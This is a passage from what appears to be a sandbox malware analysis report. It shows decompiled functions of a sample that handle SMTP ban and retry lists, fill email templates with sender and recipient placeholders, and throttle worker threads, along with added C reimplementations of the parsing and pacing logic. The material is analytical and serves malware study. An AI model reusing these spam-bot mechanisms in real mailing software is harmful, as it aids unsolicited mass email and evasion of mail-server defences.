                                                                                                                                  				}
                                                                                                                                  			}
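The decompiled function above takes a configuration record, compares the name at record offset +4 (case-insensitively, via lstrcmpiA) against `smtp_herr`, `smtp_ban` and `smtp_retr`, and for a match rebuilds the matching list: the body at +0x24 (length at +0x18) is split on `\n` into a NULL-terminated array of heap strings, a trailing `\r` is stripped from each line, the new array is swapped into one of three globals (0x413630, 0x413634, 0x413638) and the previous array is freed entry by entry. When the second argument is 3 the list is simply cleared, and any other record name returns the non-zero lstrcmpiA result untouched. The following C is an added, readable reimplementation of that logic written for this page; it is not code from the sample or from Joe Sandbox. Assumptions: `strcasecmp` stands in for lstrcmpiA, the three slot indices stand in for the three globals, the name and body are passed as plain arguments instead of being read at fixed record offsets, and the constructed sample body in `main` is illustrative, not data from the report.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* strcasecmp: POSIX stand-in for lstrcmpiA */

/* One slot per list; the globals at 0x413630/0x413634/0x413638 in the
 * memory dump map to these indices (assumption: order as in the listing). */
enum { SLOT_HERR = 0, SLOT_BAN = 1, SLOT_RETR = 2, SLOT_COUNT = 3 };
static char **g_lists[SLOT_COUNT];

/* Operation code that clears a list instead of parsing a body (_a8 == 3). */
#define CFG_OP_DELETE 3

static int slot_for_name(const char *name)
{
    if (strcasecmp(name, "smtp_herr") == 0) return SLOT_HERR;
    if (strcasecmp(name, "smtp_ban")  == 0) return SLOT_BAN;
    if (strcasecmp(name, "smtp_retr") == 0) return SLOT_RETR;
    return -1;
}

/* Free a NULL-terminated string array, entries first, then the array
 * (the loop around E0040EC2E in the listing). */
static void free_list(char **list)
{
    if (!list) return;
    for (size_t i = 0; list[i]; i++) free(list[i]);
    free(list);
}

/* Split body[0..len) on '\n' into a NULL-terminated array of C strings.
 * Two passes, as in the decompiled code: count lines (a final line with
 * no '\n' still counts), then copy each line without its '\n' and without
 * a trailing '\r'. Returns NULL for an empty body or if the array cannot
 * be allocated; a failed per-line allocation leaves a shorter, still
 * NULL-terminated array (the zeroed allocation guarantees the terminator). */
char **split_lines(const char *body, int len)
{
    if (len <= 0) return NULL;
    int n = 0;
    for (int i = 0; i < len; i++)
        if (body[i] == '\n' || i == len - 1) n++;
    char **list = calloc((size_t)n + 1, sizeof *list);
    if (!list) return NULL;
    int start = 0, k = 0;
    for (int i = 0; i < len; i++) {
        if (body[i] != '\n' && i != len - 1) continue;
        int l = i - start + (body[i] != '\n' ? 1 : 0);   /* keep last char if not '\n' */
        char *s = malloc((size_t)l + 1);
        if (!s) break;
        memcpy(s, body + start, (size_t)l);
        s[l] = '\0';
        if (l > 0 && s[l - 1] == '\r') s[l - 1] = '\0';  /* CRLF bodies */
        list[k++] = s;
        start = i + 1;
    }
    return list;
}

/* Install a record. Returns 0 for one of the three known names (the old
 * list is freed and replaced, or cleared when op == CFG_OP_DELETE) and
 * non-zero for any other name, mirroring the lstrcmpiA result the sample
 * returns. Simplification: an array-allocation failure installs NULL here,
 * whereas the sample returns without touching the global. */
int handle_smtp_list(const char *name, int op, const char *body, int len)
{
    int slot = slot_for_name(name);
    if (slot < 0) return 1;
    char **fresh = (op == CFG_OP_DELETE) ? NULL : split_lines(body, len);
    char **old = g_lists[slot];
    g_lists[slot] = fresh;
    free_list(old);
    return 0;
}

const char **list_for(int slot) { return (const char **)g_lists[slot]; }

int main(void)
{
    /* Constructed sample body: two CRLF-terminated lines plus one unterminated. */
    const char body[] = "550 bad\r\n421 busy\r\nlast";
    handle_smtp_list("smtp_retr", 0, body, (int)(sizeof body - 1));
    for (const char **p = list_for(SLOT_RETR); p && *p; p++)
        printf("[%s]\n", *p);
    handle_smtp_list("smtp_retr", CFG_OP_DELETE, NULL, 0);
    return 0;
}
```

Note the two edge cases the listing handles and this version reproduces: a body without a trailing newline still yields its last line, and a bare `\r\n` line becomes an empty string rather than a stray carriage return. Only the three names are ever accepted; everything else falls through with a non-zero return and no state change.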

                                                                                                                                  0x0040be40
                                                                                                                                  0x0040be43
                                                                                                                                  0x0040be4c
                                                                                                                                  0x0040be53
                                                                                                                                  0x0040be71
                                                                                                                                  0x0040be71
                                                                                                                                  0x0040be77
                                                                                                                                  0x0040be7a
                                                                                                                                  0x0040bf62
                                                                                                                                  0x0040bf6e
                                                                                                                                  0x0040bf83
                                                                                                                                  0x0040bf94
                                                                                                                                  0x0040bf98
                                                                                                                                  0x0040bf9d
                                                                                                                                  0x0040bf9f
                                                                                                                                  0x0040bf9f
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bfa2
                                                                                                                                  0x0040bfa7
                                                                                                                                  0x0040bfab
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bfad
                                                                                                                                  0x0040bfad
                                                                                                                                  0x0040bfaf
                                                                                                                                  0x0040bfbe
                                                                                                                                  0x0040bfb4
                                                                                                                                  0x0040bfb9
                                                                                                                                  0x0040bfba
                                                                                                                                  0x0040bfbd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bfc8
                                                                                                                                  0x0040bfab
                                                                                                                                  0x0040be80
                                                                                                                                  0x0040be83
                                                                                                                                  0x0040be87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be92
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9c
                                                                                                                                  0x0040be9d
                                                                                                                                  0x0040bea3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bea9
                                                                                                                                  0x0040beb1
                                                                                                                                  0x0040beb6
                                                                                                                                  0x0040beb7
                                                                                                                                  0x0040bebc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bec6
                                                                                                                                  0x0040becb
                                                                                                                                  0x0040bece
                                                                                                                                  0x0040bed2
                                                                                                                                  0x0040bed6
                                                                                                                                  0x0040bedb
                                                                                                                                  0x0040bee1
                                                                                                                                  0x0040bee4
                                                                                                                                  0x0040bee7
                                                                                                                                  0x0040beee
                                                                                                                                  0x0040bef9
                                                                                                                                  0x0040beff
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf02
                                                                                                                                  0x0040bf06
                                                                                                                                  0x0040bf0c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf12
                                                                                                                                  0x0040bf1c
                                                                                                                                  0x0040bf23
                                                                                                                                  0x0040bf26
                                                                                                                                  0x0040bf2c
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf49
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf52
                                                                                                                                  0x0040bf55
                                                                                                                                  0x0040bf5a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be61
                                                                                                                                  0x0040be67
                                                                                                                                  0x0040be6b
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be6b

APIs
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: lstrcmpi
• String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
• API String ID: 1586166983-142018493
• Opcode ID: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
• Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
• Opcode Fuzzy Hash: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
• Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
	char _v132;
	void* _t46;
	char* _t71;
	intOrPtr _t72;
	intOrPtr _t73;
	intOrPtr _t75;
	void* _t76;
	void* _t77;

	// _a4 is a 0x3e800-byte message template; every E0040EF7C call below
	// substitutes one %PLACEHOLDER in it (inferred from the string arguments,
	// see the String ID list for this function)
	E00405CE1(_a4, 0x3e800, _a16, 0, 0);
	E0040EF00( &_v132, "%FROM_EMAIL");
	E00405CE1( &_v132, 0x64, _a16, 0, 0);
	_t71 = E0040ED03( &_v132, 0x40); // 0x40 is '@': locate the user/domain split of the sender address
	_t77 = _t76 + 0x38;
	_t83 = _t71;
	if(_t71 != 0) {
		_t7 = _t71 + 1; // 0x1: text after '@' becomes %FROM_DOMAIN
		E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
		 *_t71 = 0; // terminate at '@' so the buffer now holds only the user part
		E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
		_t77 = _t77 + 0x28;
	}
	_t72 = _a12; // recipient record: +4 -> %TO_USER, +8/+0xc -> "%s@%s", +0xc -> %TO_DOMAIN
	E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
	wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
	E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
	_t73 = _a4;
	E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
	_t46 = E0040F0CB( &_v132);
	_push(0);
	_push( &_v132);
	_push(_t46);
	E0040F133();
	E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
	_push(_t73);
	E0040AD89( &_v132, _t83);
	// E0040B211 formats a date into _v132; the third argument is an offset
	// (0, +5 and -5 = 0xfffffffb) matching the %DATE / %P5DATE / %M5DATE names
	E0040B211(0,  &_v132, 0);
	E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
	E0040B211(0,  &_v132, 5);
	E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
	E0040B211(0,  &_v132, 0xfffffffb);
	E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
	_t75 = _a8;
	 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0; // NUL-terminate the output at the returned length
	return _t75;
}

Instruction addresses: 0x0040b3e1, 0x0040b3ef, 0x0040b3ff, 0x0040b40f, 0x0040b411, 0x0040b414, 0x0040b416, 0x0040b41a, 0x0040b426, 0x0040b439, 0x0040b43b, 0x0040b440, 0x0040b440, 0x0040b443, 0x0040b453, 0x0040b467, 0x0040b47b, 0x0040b485, 0x0040b48e, 0x0040b49a, 0x0040b49f, 0x0040b4a3, 0x0040b4a4, 0x0040b4a5, 0x0040b4b6, 0x0040b4bb, 0x0040b4bc, 0x0040b4c7, 0x0040b4d8, 0x0040b4e7, 0x0040b4f8, 0x0040b504, 0x0040b515, 0x0040b51e, 0x0040b52b, 0x0040b534

APIs
• wsprintfA.USER32 ref: 0040B467
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: lstrlen$wsprintf
• String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
• API String ID: 1220175532-2340906255
• Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
• Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
• Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
• Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E0040C2DC(void* __ebp, signed int _a4) {
	void* _t86;
	signed int _t90;
	signed int _t91;
	long _t93;
	signed int _t95;
	signed int _t101;
	signed int _t108;
	signed int _t112;
	signed int _t115;
	long _t117;
	long _t118;
	signed int _t120;
	struct _SECURITY_ATTRIBUTES* _t122;
	signed int _t123;
	signed int _t132;
	signed int _t148;
	signed char _t151;
	signed int _t154;
	signed int _t156;
	signed char* _t157;
	void* _t158;
	signed int _t163;

	_t158 = __ebp;
	_t157 = _a4; // per-task state block; offsets below are byte offsets into it
	E0040A4C7(_t157);
	_t122 = 0;
	if(_t157[0x44] == 0) {
		// task disabled: clear counters and fall through to the thread-start check
		_t157[8] = 0;
		_t157[0x34] = 0;
		_t157[0x38] = 0;
		_t157[0x3c] = 0;
		_t157[0x54] = 0;
		_t157[0x40] = 0;
		_t157[0x58] = 0;
		L31:
		_t82 =  &(_t157[4]); // 0x40c4e4
		_t86 = _t82;
		_t148 =  !( *_t157) & 0x00000001;
		_t157[0x5c] = _t122;
		_t84 =  &(_t157[8]); // 0xfffffdf0
		if( *_t86 >=  *_t84) {
			// running-thread count (+4) already at its limit (+8): nothing to start
			L34:
			return _t86;
		}
		// spawn one worker thread at E0040B535; the incremented counter and the
		// flag bit (shifted into bits 16+) are packed into the thread parameter
		_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
		if(_t86 == _t122) {
			goto L34;
		}
		return CloseHandle(_t86);
	}
	if(_t157[8] != 0) {
		__eflags = _t157[0x48];
		if(_t157[0x48] == 0) {
			L5:
			// reload the thread limit from +0x10 and derive the two timing values
			// (x 0x3e8 = 1000 and x 0x2710 = 10000; units inferred to be milliseconds)
			_t12 =  &(_t157[0x10]); // 0x59be026a
			_t90 =  *_t12;
			_t157[8] = _t90;
			_t157[0x34] = _t90;
			_t91 = _t90 * 0x3e8;
			__eflags = _t91;
			_t157[0x38] = _t122;
			_t157[0x3c] = _t122;
			_t157[0x1c] = _t90 * 0x2710;
			_t157[0x20] = _t91;
			goto L6;
		}
		_t118 = GetTickCount();
		_t11 =  &(_t157[0x48]); // 0x13740041
		// 0x927c0 = 600000 ms: re-run L5 only once ten minutes have passed since +0x48 was stamped
		__eflags = _t118 -  *_t11 - 0x927c0;
		if(_t118 -  *_t11 < 0x927c0) {
			goto L6;
		}
		goto L5;
	} else {
		// first run: initial limit comes from +0xc and the start time is recorded at +0x48
		_t4 =  &(_t157[0xc]); // 0x5756c359
		_t120 =  *_t4;
		_t157[0x1c] = _t120 * 0x2710;
		_t157[8] = _t120;
		_t157[0x20] = _t120 * 0x3e8;
		_t157[0x34] = _t120;
		_t157[0x48] = GetTickCount();
		L6:
		if(( *_t157 & 0x00000001) == 0) {
			_t73 =  &(_t157[0x34]); // 0xa1c35e5f
			_t157[8] =  *_t73;
			goto L31;
		}
		_t93 = GetTickCount();
		_t21 =  &(_t157[0x4c]); // 0x26fce850
                                                                                                                                  					if(_t93 -  *_t21 >= 0x2710) {
                                                                                                                                  						goto L31;
                                                                                                                                  					}
                                                                                                                                  					if(_t157[0x54] == _t122) {
                                                                                                                                  						_t95 = 0x3e8;
                                                                                                                                  					} else {
                                                                                                                                  						_t117 = GetTickCount();
                                                                                                                                  						_t23 =  &(_t157[0x54]); // 0x41366c1d
                                                                                                                                  						_t95 = _t117 -  *_t23;
                                                                                                                                  					}
                                                                                                                                  					_t123 = _t95;
                                                                                                                                  					if(_t95 < 1) {
                                                                                                                                  						_t123 = 1;
                                                                                                                                  					}
                                                                                                                                  					if(_t123 > 0x4e20) {
                                                                                                                                  						_t123 = 0x4e20;
                                                                                                                                  					}
                                                                                                                                  					_t24 =  &(_t157[0x58]); // 0x701d8900
                                                                                                                                  					_t25 =  &(_t157[0x40]); // 0x74c33b57
                                                                                                                                  					_t151 =  *_t25;
                                                                                                                                  					_t132 =  *_t24 * 0x3e8;
                                                                                                                                  					_push(_t158);
                                                                                                                                  					asm("cdq");
                                                                                                                                  					_push(0x14);
                                                                                                                                  					_a4 = _t123;
                                                                                                                                  					asm("cdq");
                                                                                                                                  					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
                                                                                                                                  					if(_t101 == 0) {
                                                                                                                                  						__eflags = _t132 - _t151;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							goto L22;
                                                                                                                                  						}
                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                  							_t156 = _t151 + 1;
                                                                                                                                  							__eflags = _t156;
                                                                                                                                  						} else {
                                                                                                                                  							_t156 = _t151 - 1;
                                                                                                                                  						}
                                                                                                                                  						goto L21;
                                                                                                                                  					} else {
                                                                                                                                  						_t156 = _t151 + _t101;
                                                                                                                                  						L21:
                                                                                                                                  						_t157[0x40] = _t156;
                                                                                                                                  						L22:
                                                                                                                                  						if(_t157[0x40] < 0) {
                                                                                                                                  							_t157[0x40] = _t157[0x40] & 0x00000000;
                                                                                                                                  						}
                                                                                                                                  						_t39 =  &(_t157[0x40]); // 0x74c33b57
                                                                                                                                  						_t163 = (0xc8 -  *_t39) * 0x14;
                                                                                                                                  						if(_t123 > 0x3e8) {
                                                                                                                                  							_a4 = 0x3e8;
                                                                                                                                  						}
                                                                                                                                  						asm("cdq");
                                                                                                                                  						_t46 =  &(_t157[0x14]); // 0x5f004120
                                                                                                                                  						_t47 =  &(_t157[0x10]); // 0x59be026a
                                                                                                                                  						asm("cdq");
                                                                                                                                  						_t49 =  &(_t157[0x30]); // 0xe4754f45
                                                                                                                                  						_t54 =  &(_t157[0x20]); // 0x406a0000
                                                                                                                                  						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                                                                  						asm("cdq");
                                                                                                                                  						_t56 =  &(_t157[0x2c]); // 0xc68314c4
                                                                                                                                  						_t157[0x20] = _t108;
                                                                                                                                  						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
                                                                                                                                  						asm("cdq");
                                                                                                                                  						_t122 = 0;
                                                                                                                                  						_t157[0x58] = 0;
                                                                                                                                  						_t154 = _t112 / 0x3e8;
                                                                                                                                  						_t157[0x54] = GetTickCount();
                                                                                                                                  						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                                                                  						_t115 =  *_t68;
                                                                                                                                  						if(_t115 <= _t154) {
                                                                                                                                  							_t157[8] = _t115;
                                                                                                                                  							_t157[0x20] = _t115 * 0x3e8;
                                                                                                                                  						} else {
                                                                                                                                  							_t157[8] = _t154;
                                                                                                                                  							_t157[0x1c] = _t154 * 0x2710;
                                                                                                                                  						}
                                                                                                                                  						goto L31;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
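Added here as an analyst's model, not code from the report or from the sample: a C re-expression of the L6..L31 path in the pseudocode above, with the constants decoded (0x2710 = 10,000 ms, 0x4e20 = 20,000 ms, 0x3e8 = 1000, 0xc8 = 200, 0x14 = 20; the 0x927c0 that the first branch compares against _t157[0x48] is 600,000 ms, ten minutes). The fragment only runs this path within 10 s of the _t157[0x4c] snapshot, clamps the elapsed interval to 1..20,000 ms, nudges _t157[0x40] toward _t157[0x58] * 1000, and feeds (200 - _t157[0x40]) * 20 through two E0040A505 calls before writing the result to _t157[8]. Assumptions, all mine: E0040A505 is treated as a clamp because both calls pass _t157[0x10] * 1000 and _t157[0x14] * 1000 as bounds; _t122 is taken to be zero (the fragment zeroes it before L31); GetTickCount is replaced by a caller-supplied tick so the arithmetic runs off Windows; the slot names (s8, s40, ...), the divide-by-zero guard and the starting values are constructed for the demo and carry no meaning from the sample.

```c
#include <stdint.h>
#include <stdio.h>

/* Slots named by the index the pseudocode uses (_t157[0x40] -> s40).
 * Roles are inferred from the fragment's use of them, not from symbols. */
typedef struct {
    uint32_t flags;  /* *_t157: bit 0 selects the adaptive path              */
    int32_t  s8;     /* _t157[8]: written on every exit                      */
    int32_t  s10;    /* _t157[0x10]: lower bound, used as s10 * 1000         */
    int32_t  s14;    /* _t157[0x14]: upper bound, used as s14 * 1000         */
    int32_t  s1c;    /* _t157[0x1c]: set to s8 * 10000 on one exit           */
    int32_t  s20;    /* _t157[0x20]: running value fed into the next pass    */
    int32_t  s2c;    /* _t157[0x2c]: divisor                                 */
    int32_t  s30;    /* _t157[0x30]: divisor                                 */
    int32_t  s34;    /* _t157[0x34]: cap applied on exit                     */
    int32_t  s40;    /* _t157[0x40]: level nudged toward s58 * 1000          */
    uint32_t t4c;    /* _t157[0x4c]: tick snapshot; path runs only within 10 s */
    uint32_t t54;    /* _t157[0x54]: tick of the previous pass (0 = none)    */
    int32_t  s58;    /* _t157[0x58]: target, cleared after each pass         */
} pacer_t;

/* E0040A505 is not in the fragment; ASSUMED to be a clamp (see lead-in). */
static int32_t e0040a505(int32_t v, int32_t lo, int32_t hi)
{
    if (v < lo) return lo;
    if (v > hi) return hi;
    return v;
}

/* One pass: 1 = adaptive path ran, 0 = early jump to L31,
 * -1 = divide by zero (guard added here; the sample does not check). */
static int pacer_step(pacer_t *s, uint32_t now)
{
    if ((s->flags & 1) == 0) { s->s8 = s->s34; return 0; }
    if (now - s->t4c >= 10000) return 0;           /* 0x2710 */
    if (s->s30 == 0 || s->s2c == 0) return -1;

    /* _t122 assumed 0: first pass uses a fixed 1000 ms interval */
    int32_t elapsed = (s->t54 == 0) ? 1000 : (int32_t)(now - s->t54);
    if (elapsed < 1)     elapsed = 1;
    if (elapsed > 20000) elapsed = 20000;           /* 0x4e20 */

    /* cdq + idiv: signed division truncating toward zero, as in C */
    int32_t target = s->s58 * 1000, level = s->s40;
    int32_t delta  = (target - level) * elapsed / 1000 / 1000;
    if (delta == 0) {                               /* too small: nudge by one */
        if (target > level)      level += 1;
        else if (target < level) level -= 1;
    } else {
        level += delta;
    }
    if (level < 0) level = 0;                       /* the `& 0x00000000` clamp */
    s->s40 = level;

    int32_t err  = (200 - level) * 20;              /* (0xc8 - s40) * 0x14 */
    int32_t step = elapsed > 1000 ? 1000 : elapsed; /* _a4 */
    int32_t lo = s->s10 * 1000, hi = s->s14 * 1000;
    int32_t v1 = e0040a505(err * step / 1000 / s->s30 + s->s20, lo, hi);
    s->s20 = v1;
    int32_t v2 = e0040a505(err / s->s2c + v1, lo, hi);

    s->s58 = 0;
    int32_t secs = v2 / 1000;
    s->t54 = now;
    if (s->s34 <= secs) { s->s8 = s->s34; s->s20 = s->s34 * 1000; }
    else                { s->s8 = secs;   s->s1c = secs * 10000;  }
    return 1;
}

/* Constructed starting state; every value is made up for the demo. */
static pacer_t demo_state(void)
{
    pacer_t s = {0};
    s.flags = 1; s.s10 = 5; s.s14 = 60; s.s20 = 30000; s.s2c = 4;
    s.s30 = 2;   s.s34 = 45; s.s40 = 0; s.t4c = 100000; s.s58 = 3;
    return s;
}

/* State after `passes` passes at constructed ticks 105000 then 106500. */
static pacer_t demo_after(int passes)
{
    static const uint32_t ticks[] = {105000, 106500};
    pacer_t s = demo_state();
    for (int i = 0; i < passes && i < 2; i++) pacer_step(&s, ticks[i]);
    return s;
}

/* Return code of a single pass with the given flags word and tick. */
static int demo_exit(uint32_t flags, uint32_t now)
{
    pacer_t s = demo_state();
    s.flags = flags;
    return pacer_step(&s, now);
}

int main(void)
{
    for (int n = 1; n <= 2; n++) {
        pacer_t s = demo_after(n);
        printf("pass %d: s8=%d s40=%d s20=%d s1c=%d\n", n, s.s8, s.s40, s.s20, s.s1c);
    }
    return 0;
}
```

The second pass is the interesting one: with the target cleared to 0 after pass one, (0 - 3) * 1500 / 1000 / 1000 truncates to 0, so the code falls into the nudge branch and moves the level by exactly one rather than leaving it stuck.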
Instruction addresses for the pseudocode above: 0x0040c2dc through 0x0040c4d5 (the report's per-line address column, with several 0x00000000 entries, detached from the code by extraction).
                                                                                                                                  0x0040c46c
                                                                                                                                  0x0040c475
                                                                                                                                  0x0040c45e
                                                                                                                                  0x0040c45e
                                                                                                                                  0x0040c467
                                                                                                                                  0x0040c467
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c45c
                                                                                                                                  0x0040c3c1

APIs
  • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
  • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
• GetTickCount.KERNEL32 ref: 0040C31F
• GetTickCount.KERNEL32 ref: 0040C32B
• GetTickCount.KERNEL32 ref: 0040C363
• GetTickCount.KERNEL32 ref: 0040C378
• GetTickCount.KERNEL32 ref: 0040C44D
• InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
• CreateThread.KERNEL32 ref: 0040C4C1
• CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
• String ID: 0 v$localcfg
• API String ID: 1553760989-2166502722
• Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
• Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
• Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
• Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
Uniqueness

Uniqueness Score: -1.00%

APIs
• htons.WS2_32(0040CA1D), ref: 0040F34D
• socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
• closesocket.WS2_32(00000000), ref: 0040F375
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: closesockethtonssocket
• String ID: time_cfg
• API String ID: 311057483-2401304539
• Opcode ID: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
• Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
• Opcode Fuzzy Hash: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
• Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 00AD3068
• LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00AD3078
• GetProcAddress.KERNEL32(00000000,00410408), ref: 00AD3095
• RtlAllocateHeap.NTDLL(00000000), ref: 00AD30B6
• htons.WS2_32(00000035), ref: 00AD30EF
• inet_addr.WS2_32(?), ref: 00AD30FA
• gethostbyname.WS2_32(?), ref: 00AD310D
• HeapFree.KERNEL32(00000000), ref: 00AD314D
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
• String ID: iphlpapi.dll
• API String ID: 2869546040-3565520932
